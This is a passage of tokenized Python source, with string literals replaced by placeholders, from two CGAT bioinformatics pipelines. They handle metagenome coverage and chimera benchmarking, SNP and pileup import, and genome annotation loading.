write ( header ) <EOL> for infile in infiles : <EOL> inf = open ( infile ) <EOL> header = inf . readline ( ) <EOL> outf . write ( inf . readline ( ) ) <EOL> outf . close ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( SEQUENCE_FILES , regex ( "<STR_LIT>" ) , add_inputs ( mergeGenomeSizes ) , r"<STR_LIT>" ) <EOL> def buildExpectedGenomeCoverage ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . submit ( "<STR_LIT>" , <EOL> "<STR_LIT>" , infiles = infiles , outfiles = outfile ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ merge ( [ buildAlignmentSizes , mergeGenomeSizes ] , "<STR_LIT>" ) <EOL> def buildCoverageOverGenomes ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . submit ( "<STR_LIT>" , "<STR_LIT>" , <EOL> infiles = infiles , outfiles = outfile ) <EOL> @ transform ( buildExpectedGenomeCoverage , regex ( "<STR_LIT>" ) , add_inputs ( buildCoverageOverGenomes ) , r"<STR_LIT>" ) <EOL> def mergeExpectedAndObservedGenomeCoverage ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> expected = open ( infiles [ <NUM_LIT:0> ] ) <EOL> expected_header = expected . readline ( ) <EOL> observed = open ( infiles [ <NUM_LIT:1> ] ) <EOL> observed_header = observed . readline ( ) <EOL> expected_data = { } <EOL> E . info ( "<STR_LIT>" ) <EOL> for line in expected . readlines ( ) : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> gi , coverage = data [ <NUM_LIT:0> ] , data [ <NUM_LIT:1> ] <EOL> expected_data [ gi ] = coverage <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> E . info ( "<STR_LIT>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for line in observed . readlines ( ) : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> track , gi , species , coverage = data [ <NUM_LIT:0> ] , data [ <EOL> <NUM_LIT:1> ] , "<STR_LIT:_>" . join ( data [ <NUM_LIT:2> ] . split ( "<STR_LIT:_>" ) [ <NUM_LIT:5> : <NUM_LIT:7> ] ) , data [ <NUM_LIT:3> ] <EOL> outf . 
write ( "<STR_LIT>" % <EOL> ( track , gi , species , coverage , expected_data [ gi ] ) ) <EOL> outf . close ( ) <EOL> @ transform ( mergeExpectedAndObservedGenomeCoverage , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadExpectedAndObservedGenomeCoverage ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ split ( buildCoverageOverGenomes , "<STR_LIT>" ) <EOL> def plotCoverageOverGenomes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PipelineMetagenomeBenchmark . plotCoverageOverGenomes ( infile , outfile ) <EOL> def chimeraTargets ( alignment_files , contig_files ) : <EOL> '''<STR_LIT>''' <EOL> parameters = [ ] <EOL> for alignment , contig in itertools . product ( genome_files , contig_files ) : <EOL> outfile = os . path . join ( <EOL> "<STR_LIT>" , P . snip ( alignment , "<STR_LIT>" ) + "<STR_LIT>" ) <EOL> parameters . append ( [ outfile , alignment , contig ] ) <EOL> return parameters <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( ALIGNMENTS , regex ( "<STR_LIT>" ) , add_inputs ( CONTIGS ) , r"<STR_LIT>" ) <EOL> def buildSpeciesMap ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> bam = infiles [ <NUM_LIT:0> ] <EOL> contig = [ x for x in infiles [ <NUM_LIT:1> ] if P . snip ( <EOL> x , "<STR_LIT>" ) == P . snip ( bam , "<STR_LIT>" ) ] [ <NUM_LIT:0> ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildSpeciesMap , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def renameGenomesInSpeciesMap ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> genomes_dir = PARAMS [ "<STR_LIT>" ] <EOL> statement = '''<STR_LIT>''' <EOL> P . 
run ( ) <EOL> @ transform ( CONTIGS , regex ( "<STR_LIT>" ) , add_inputs ( renameGenomesInSpeciesMap ) , r"<STR_LIT>" ) <EOL> def buildExpectedContigs ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = False <EOL> contig = infiles [ <NUM_LIT:0> ] <EOL> inputs = [ infile for infile in infiles if infile != contig ] <EOL> species_map = [ infile for infile in inputs if P . snip ( <EOL> os . path . basename ( infile ) , "<STR_LIT>" ) == P . snip ( contig , "<STR_LIT>" ) ] [ <NUM_LIT:0> ] <EOL> genomes_dir = PARAMS [ "<STR_LIT>" ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildExpectedContigs , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def buildBwaIndices ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> P . touch ( outfile ) <EOL> @ transform ( buildBwaIndices , regex ( "<STR_LIT>" ) , add_inputs ( SEQUENCE_FILES ) , r"<STR_LIT>" ) <EOL> def mapReadsWithBwaAgainstExpectedContigs ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> index_dir = os . path . dirname ( outfile ) <EOL> genome = os . path . basename ( <EOL> re . search ( "<STR_LIT>" , infiles [ <NUM_LIT:0> ] ) . group ( <NUM_LIT:0> ) + "<STR_LIT>" ) <EOL> track = P . snip ( genome , "<STR_LIT>" ) <EOL> fastq = [ infile for infile in infiles [ <NUM_LIT:1> ] <EOL> if P . snip ( infile , "<STR_LIT>" ) == track ] [ <NUM_LIT:0> ] <EOL> job_options = "<STR_LIT>" % ( PARAMS [ "<STR_LIT>" ] ) <EOL> bwa_index_dir = index_dir <EOL> bwa_aln_options = PARAMS [ "<STR_LIT>" ] <EOL> bwa_sampe_options = PARAMS [ "<STR_LIT>" ] <EOL> bwa_threads = PARAMS [ "<STR_LIT>" ] <EOL> m = PipelineMapping . BWA ( remove_non_unique = True ) <EOL> statement = m . build ( ( fastq , ) , outfile ) <EOL> P . 
run ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( ALIGNMENTS , regex ( "<STR_LIT>" ) , r"<STR_LIT>" ) <EOL> def linkAlignmentFiles ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( [ linkAlignmentFiles , mapReadsWithBwaAgainstExpectedContigs ] , regex ( "<STR_LIT>" ) , r"<STR_LIT>" ) <EOL> def buildChimerasBasedOnReads ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . submit ( "<STR_LIT>" , <EOL> "<STR_LIT>" , infiles = infile , outfiles = outfile ) <EOL> @ merge ( buildChimerasBasedOnReads , "<STR_LIT>" ) <EOL> def mergeChimeras ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> @ transform ( buildChimerasBasedOnReads , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadChimericityScores ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ transform ( linkAlignmentFiles , suffix ( "<STR_LIT>" ) , add_inputs ( glob . glob ( "<STR_LIT>" ) ) , "<STR_LIT>" ) <EOL> def buildUniformityOfCoverage ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> bam = infiles [ <NUM_LIT:0> ] <EOL> track = P . snip ( os . path . basename ( bam ) , "<STR_LIT>" ) <EOL> tmp_bed = P . getTempFilename ( "<STR_LIT:.>" ) + "<STR_LIT>" <EOL> tmp_bam = P . getTempFilename ( "<STR_LIT:.>" ) + "<STR_LIT>" <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> for infs in infiles [ <NUM_LIT:1> : ] : <EOL> for inf in infs : <EOL> if P . snip ( inf , "<STR_LIT>" ) == track : <EOL> length_file = inf <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> os . unlink ( tmp_bed ) <EOL> os . unlink ( tmp_bam ) <EOL> @ follows ( taxonomy , loadExpectedAndObservedGenomeCoverage , loadChimericityScores ) <EOL> def full ( ) : <EOL> pass <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> def build_report ( ) : <EOL> '''<STR_LIT>''' <EOL> E . info ( "<STR_LIT>" ) <EOL> P . 
run_report ( clean = True ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> def update_report ( ) : <EOL> '''<STR_LIT>''' <EOL> E . info ( "<STR_LIT>" ) <EOL> P . run_report ( clean = False ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( P . main ( sys . argv ) ) </s>
<s> """<STR_LIT>""" <EOL> from ruffus import * <EOL> import sys <EOL> import glob <EOL> import gzip <EOL> import os <EOL> import itertools <EOL> import CGAT . CSV as CSV <EOL> import re <EOL> import math <EOL> import types <EOL> import collections <EOL> import time <EOL> import optparse <EOL> import shutil <EOL> import numpy <EOL> import sqlite3 <EOL> import CGAT . GFF as GFF <EOL> import CGAT . GTF as GTF <EOL> import CGAT . Experiment as E <EOL> import CGAT . Pipeline as P <EOL> import CGAT . IOTools as IOTools <EOL> import CGAT . Genomics as Genomics <EOL> import CGAT . Database as Database <EOL> import CGAT . FastaIterator as FastaIterator <EOL> import PipelineGeneset as PGeneset <EOL> import PipelineEnrichment as PEnrichment <EOL> import PipelineGO as PGO <EOL> import PipelineBiomart as PBiomart <EOL> import PipelineDatabase as PDatabase <EOL> import scipy . stats <EOL> import CGAT . Stats as Stats <EOL> import pysam <EOL> import rpy2 <EOL> from rpy2 . robjects import r as R <EOL> P . getParameters ( <EOL> [ "<STR_LIT>" % os . path . splitext ( __file__ ) [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> P . PARAMS . update ( <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' } ) <EOL> PARAMS = P . PARAMS <EOL> if os . path . exists ( "<STR_LIT>" ) : <EOL> execfile ( "<STR_LIT>" ) <EOL> SEPARATOR = "<STR_LIT:|>" <EOL> if PARAMS [ "<STR_LIT>" ] : <EOL> @ split ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def importSNPs ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outfiles = IOTools . FilePool ( "<STR_LIT>" ) <EOL> inf = gzip . open ( infile , "<STR_LIT:r>" ) <EOL> headers = [ ] <EOL> counts = E . Counter ( ) <EOL> if "<STR_LIT>" in PARAMS : <EOL> intervals = GTF . readAndIndex ( GTF . iterator ( IOTools . 
openFile ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT:r>" ) ) ) <EOL> else : <EOL> intervals = None <EOL> for line in inf : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if line . startswith ( "<STR_LIT:#>" ) : <EOL> if not headers : headers = data [ <NUM_LIT:3> : ] <EOL> continue <EOL> counts . input += <NUM_LIT:1> <EOL> contig , pos , ref = data [ : <NUM_LIT:3> ] <EOL> pos = int ( pos ) <EOL> if intervals : <EOL> if not intervals . contains ( "<STR_LIT>" % contig , pos - <NUM_LIT:1> , pos ) : <EOL> counts . filter += <NUM_LIT:1> <EOL> continue <EOL> for h , genotype in zip ( headers , data [ <NUM_LIT:3> : ] ) : <EOL> if genotype == "<STR_LIT:..>" : continue <EOL> outfiles . write ( h , <EOL> "<STR_LIT:\t>" . join ( map ( str , ( <EOL> contig , <EOL> pos , <EOL> ref , <EOL> Genomics . encodeGenotype ( genotype ) , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> genotype , <EOL> "<STR_LIT:<>" * len ( genotype ) ) ) ) + "<STR_LIT:\n>" ) <EOL> counts . output += <NUM_LIT:1> <EOL> outfiles . close ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( counts ) ) <EOL> E . info ( "<STR_LIT>" ) <EOL> outfiles = glob . glob ( "<STR_LIT>" ) <EOL> for outfile in outfiles : <EOL> E . info ( "<STR_LIT>" % outfile ) <EOL> pysam . tabix_index ( outfile , preset = "<STR_LIT>" ) <EOL> elif PARAMS [ "<STR_LIT>" ] : <EOL> pass <EOL> elif PARAMS [ "<STR_LIT>" ] : <EOL> @ split ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def buildPileups ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outfiles = IOTools . FilePool ( "<STR_LIT>" ) <EOL> if "<STR_LIT>" in PARAMS : <EOL> def _defdict ( ) : return collections . defaultdict ( list ) <EOL> filter_snps = collections . defaultdict ( _defdict ) <EOL> x = <NUM_LIT:0> <EOL> for line in IOTools . openFile ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT:r>" ) : <EOL> if line . startswith ( "<STR_LIT>" ) : continue <EOL> if line . 
startswith ( "<STR_LIT:#>" ) : continue <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> track , contig , pos = data [ <NUM_LIT:0> ] , data [ <NUM_LIT:1> ] , int ( data [ <NUM_LIT:2> ] ) <EOL> track = track [ len ( "<STR_LIT>" ) : ] <EOL> filter_snps [ track ] [ contig ] . append ( pos ) <EOL> x += <NUM_LIT:1> <EOL> E . info ( "<STR_LIT>" % x ) <EOL> else : <EOL> filter_snps = None <EOL> if "<STR_LIT>" in PARAMS : <EOL> E . info ( "<STR_LIT>" ) <EOL> intervals = GTF . readAndIndex ( GTF . iterator ( IOTools . openFile ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT:r>" ) ) ) <EOL> E . info ( "<STR_LIT>" ) <EOL> else : <EOL> intervals = None <EOL> inf = gzip . open ( infile , "<STR_LIT:r>" ) <EOL> headers = [ ] <EOL> ninput = <NUM_LIT:0> <EOL> counts = E . Counter ( ) <EOL> for line in inf : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> if not headers : headers = data [ <NUM_LIT:9> : ] <EOL> continue <EOL> elif line . startswith ( "<STR_LIT:#>" ) : <EOL> continue <EOL> contig , pos , ref = data [ <NUM_LIT:0> ] , data [ <NUM_LIT:1> ] , data [ <NUM_LIT:3> ] <EOL> pos = int ( pos ) <EOL> variants = [ ref ] <EOL> variants . extend ( data [ <NUM_LIT:4> ] . split ( "<STR_LIT:U+002C>" ) ) <EOL> counts . input += <NUM_LIT:1> <EOL> contig = "<STR_LIT>" % contig <EOL> if intervals : <EOL> if not intervals . contains ( contig , pos - <NUM_LIT:1> , pos ) : <EOL> counts . filter += <NUM_LIT:1> <EOL> continue <EOL> for h , genotype_info in zip ( headers , data [ <NUM_LIT:9> : ] ) : <EOL> if genotype_info == "<STR_LIT:.>" or genotype_info . startswith ( "<STR_LIT>" ) : continue <EOL> consensus_quality , genotype_quality , read_depth = "<STR_LIT:0>" , "<STR_LIT:0>" , "<STR_LIT:0>" <EOL> dd = genotype_info . 
split ( "<STR_LIT::>" ) <EOL> if len ( dd ) == <NUM_LIT:5> : <EOL> genotype , mapping_quality , hcg , genotype_quality , read_depth = dd <EOL> if hcg != "<STR_LIT:1>" : continue <EOL> elif len ( dd ) == <NUM_LIT:4> : <EOL> genotype , mapping_quality , genotype_quality , read_depth = dd <EOL> elif len ( dd ) == <NUM_LIT:2> : <EOL> genotype , genotype_quality = dd <EOL> elif len ( dd ) == <NUM_LIT:1> : <EOL> genotype = dd [ <NUM_LIT:0> ] <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( genotype_info , line ) ) <EOL> genotype = genotype . split ( "<STR_LIT:/>" ) <EOL> if filter_snps : <EOL> if pos - <NUM_LIT:1> in filter_snps [ h ] [ contig ] : <EOL> counts . filtered_snps += <NUM_LIT:1> <EOL> continue <EOL> if len ( set ( genotype ) ) != <NUM_LIT:1> : continue <EOL> genotype = [ variants [ int ( x ) ] for x in genotype ] <EOL> lengths = [ len ( x ) for x in genotype ] + [ len ( ref ) ] <EOL> is_snp = len ( set ( lengths ) ) == <NUM_LIT:1> and lengths [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> if "<STR_LIT:.>" in genotype : continue <EOL> if is_snp : <EOL> genotype = "<STR_LIT>" . join ( genotype ) <EOL> if genotype == "<STR_LIT>" % ( ref , ref ) : <EOL> continue <EOL> outfiles . write ( h , <EOL> "<STR_LIT:\t>" . join ( map ( str , ( <EOL> contig , <EOL> pos , <EOL> ref , <EOL> Genomics . 
encodeGenotype ( genotype ) , <EOL> consensus_quality , <EOL> genotype_quality , <EOL> mapping_quality , <EOL> read_depth , <EOL> genotype , <EOL> "<STR_LIT:<>" * len ( genotype ) ) ) ) + "<STR_LIT:\n>" ) <EOL> else : <EOL> def getPrefix ( s1 , s2 ) : <EOL> '''<STR_LIT>''' <EOL> n = min ( len ( s1 ) , len ( s2 ) ) <EOL> predix = [ ] <EOL> for x in range ( n ) : <EOL> if s1 [ x ] != s2 [ x ] : return s1 [ : x ] <EOL> return s1 [ : n ] <EOL> def getSuffix ( s1 , s2 ) : <EOL> '''<STR_LIT>''' <EOL> n = min ( len ( s1 ) , len ( s2 ) ) <EOL> predix = [ ] <EOL> if s1 [ - <NUM_LIT:1> ] != s2 [ - <NUM_LIT:1> ] : return "<STR_LIT>" <EOL> for x in range ( - <NUM_LIT:2> , - n - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> if s1 [ x ] != s2 [ x ] : return s1 [ x + <NUM_LIT:1> : ] <EOL> return s1 [ - n : ] <EOL> def getGenotype ( variant , ref ) : <EOL> if variant == ref : return "<STR_LIT:*>" , <NUM_LIT:0> <EOL> if len ( ref ) > len ( variant ) : <EOL> if ref . startswith ( variant ) : <EOL> return "<STR_LIT>" % ref [ len ( variant ) : ] , len ( variant ) - <NUM_LIT:1> <EOL> elif ref . endswith ( variant ) : <EOL> return "<STR_LIT>" % ref [ : - len ( variant ) ] , - <NUM_LIT:1> <EOL> else : <EOL> prefix = getPrefix ( ref , variant ) <EOL> suffix = getSuffix ( ref , variant ) <EOL> shared = len ( prefix ) + len ( suffix ) - len ( variant ) <EOL> if shared < <NUM_LIT:0> : <EOL> raise ValueError ( ) <EOL> return "<STR_LIT>" % ref [ len ( prefix ) : - ( len ( suffix ) - shared ) ] , len ( prefix ) - <NUM_LIT:1> <EOL> elif len ( ref ) < len ( variant ) : <EOL> if variant . startswith ( ref ) : <EOL> return "<STR_LIT>" % variant [ len ( ref ) : ] , len ( ref ) - <NUM_LIT:1> <EOL> elif variant . 
endswith ( ref ) : <EOL> return "<STR_LIT>" % variant [ : len ( ref ) ] , <NUM_LIT:0> <EOL> else : <EOL> prefix = getPrefix ( ref , variant ) <EOL> suffix = getSuffix ( ref , variant ) <EOL> shared = len ( prefix ) + len ( suffix ) - len ( ref ) <EOL> if shared < <NUM_LIT:0> : <EOL> raise ValueError ( ) <EOL> return "<STR_LIT>" % variant [ len ( prefix ) : - ( len ( suffix ) - shared ) ] , len ( prefix ) <EOL> else : <EOL> assert <NUM_LIT:0> , "<STR_LIT>" <EOL> genotypes , offsets = [ ] , [ ] <EOL> is_error = True <EOL> for variant in genotype : <EOL> try : <EOL> g , offset = getGenotype ( variant , ref ) <EOL> except ValueError : <EOL> break <EOL> assert len ( g ) > <NUM_LIT:1> , "<STR_LIT>" % g <EOL> genotypes . append ( g ) <EOL> offsets . append ( offset ) <EOL> else : <EOL> is_error = False <EOL> if is_error : <EOL> print line , <EOL> counts . errors += <NUM_LIT:1> <EOL> continue <EOL> assert len ( set ( offsets ) ) == <NUM_LIT:1> <EOL> offset = offsets [ <NUM_LIT:0> ] <EOL> genotypes = "<STR_LIT:/>" . join ( genotypes ) <EOL> outfiles . write ( h , <EOL> "<STR_LIT:\t>" . join ( map ( str , ( <EOL> contig , <EOL> pos + offset , <EOL> "<STR_LIT:*>" , <EOL> genotypes , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> genotypes , <EOL> "<STR_LIT:<>" * len ( genotype ) , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" ) ) ) + "<STR_LIT:\n>" ) <EOL> counts . output += <NUM_LIT:1> <EOL> outfiles . close ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( counts ) ) <EOL> @ transform ( buildPileups , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def indexPileups ( infile , outfile ) : <EOL> E . info ( "<STR_LIT>" % infile ) <EOL> statement = "<STR_LIT>" <EOL> P . run ( ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> if os . path . exists ( outfile ) : <EOL> os . remove ( outfile ) <EOL> E . info ( "<STR_LIT>" % infile ) <EOL> pysam . 
tabix_index ( infile , preset = "<STR_LIT>" ) <EOL> @ follows ( indexPileups ) <EOL> def importSNPs ( ) : pass <EOL> @ jobs_limit ( <NUM_LIT:2> ) <EOL> @ transform ( "<STR_LIT>" , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadPileup ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = False <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> else : <EOL> @ merge ( "<STR_LIT>" , None ) <EOL> def buildPileups ( ) : pass <EOL> @ transform ( buildPileups , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def countPileups ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> if "<STR_LIT>" in PARAMS : <EOL> @ split ( ( PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> ) , <EOL> ( PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] ) ) <EOL> def importRefseq ( infiles , outfiles ) : <EOL> '''<STR_LIT>''' <EOL> infile_gtf , infile_pep , infile_cdna , infile_map , infile_ensembl = infiles <EOL> outfile_gtf , outfile_pep , outfile_cdna = outfiles <EOL> tmpfilename1 = P . getTempFilename ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> tmpfilename2 = P . getTempFilename ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> if not os . path . exists ( outfile_gtf ) : <EOL> P . run ( ) <EOL> for infile , outfile in ( ( infile_pep , outfile_pep ) , <EOL> ( infile_cdna , outfile_cdna ) ) : <EOL> statement = '''<STR_LIT>''' <EOL> if not os . path . exists ( outfile ) : <EOL> P . run ( ) <EOL> table = "<STR_LIT>" <EOL> if <NUM_LIT:0> : <EOL> outf = open ( tmpfilename1 , "<STR_LIT:w>" ) <EOL> reader = CSV . DictReader ( IOTools . openFile ( infile_ensembl ) , dialect = "<STR_LIT>" ) <EOL> c = E . Counter ( ) <EOL> outf . 
write ( "<STR_LIT>" ) <EOL> for row in reader : <EOL> c . input += <NUM_LIT:1> <EOL> gene_id , transcript_id , refseq_transcript_id , refseq_protein_id , ccds_id = [ x . strip ( ) for x in <EOL> ( row [ "<STR_LIT>" ] , <EOL> row [ "<STR_LIT>" ] , <EOL> row [ "<STR_LIT>" ] , <EOL> row [ "<STR_LIT>" ] , <EOL> row [ "<STR_LIT>" ] , <EOL> ) ] <EOL> if not ( transcript_id and gene_id and refseq_transcript_id and refseq_protein_id ) : <EOL> c . skipped += <NUM_LIT:1> <EOL> continue <EOL> c . output += <NUM_LIT:1> <EOL> outf . write ( "<STR_LIT>" % <EOL> ( gene_id , transcript_id , refseq_transcript_id , refseq_protein_id , ccds_id ) ) <EOL> outf . close ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( c ) ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> os . unlink ( tmpfilename1 ) <EOL> os . unlink ( tmpfilename2 ) <EOL> if "<STR_LIT>" in PARAMS : <EOL> @ split ( ( PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> ) , <EOL> ( PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" ) ) <EOL> def importRefseqFromUCSC ( infiles , outfiles ) : <EOL> '''<STR_LIT>''' <EOL> infile_gtf , infile_pep , infile_cdna , infile_map = infiles <EOL> outfile_gtf , outfile_pep , outfile_cdna , outfile_load = outfiles <EOL> if not os . path . exists ( outfile_gtf ) : <EOL> PGeneset . importRefSeqFromUCSC ( infile_gtf , outfile_gtf , remove_duplicates = True ) <EOL> for infile , outfile in ( ( infile_pep , outfile_pep ) , <EOL> ( infile_cdna , outfile_cdna ) ) : <EOL> statement = '''<STR_LIT>''' <EOL> if not os . path . exists ( outfile ) : <EOL> P . run ( ) <EOL> @ files ( "<STR_LIT>" % PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" % PARAMS [ "<STR_LIT>" ] ) <EOL> def indexGenome ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> pysam . 
faidx ( outfile ) <EOL> map_synonym2strains = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:A>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> @ active_if ( "<STR_LIT>" in PARAMS ) <EOL> @ split ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def importSVs ( infile , outfiles ) : <EOL> '''<STR_LIT>''' <EOL> statement = "<STR_LIT>" <EOL> P . run ( ) <EOL> c = E . Counter ( ) <EOL> for infile in glob . glob ( "<STR_LIT>" ) : <EOL> c . nfiles += <NUM_LIT:1> <EOL> dirname , basename = os . path . split ( infile ) <EOL> track = re . sub ( "<STR_LIT>" , "<STR_LIT>" , basename ) . upper ( ) <EOL> if track in map_synonym2strains : <EOL> track = map_synonym2strains [ track ] <EOL> outfile = "<STR_LIT>" % track <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> os . unlink ( infile ) <EOL> E . info ( "<STR_LIT>" % outfile ) <EOL> os . unlink ( "<STR_LIT>" ) <EOL> E . info ( "<STR_LIT:%s>" % c ) <EOL> @ files ( ( ( None , "<STR_LIT>" ) , ) ) <EOL> def importPseudogenes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tmpfile = "<STR_LIT>" <EOL> if not os . path . exists ( tmpfile + "<STR_LIT>" ) : <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> P . run ( ) <EOL> tablename = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( None , "<STR_LIT>" ) , ) ) <EOL> def importMGI ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> filename = "<STR_LIT>" <EOL> if False : <EOL> R . library ( "<STR_LIT>" ) <EOL> columns = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> keys = columns . keys ( ) <EOL> mgi = R . useMart ( biomart = "<STR_LIT>" , dataset = "<STR_LIT>" ) <EOL> result = R . 
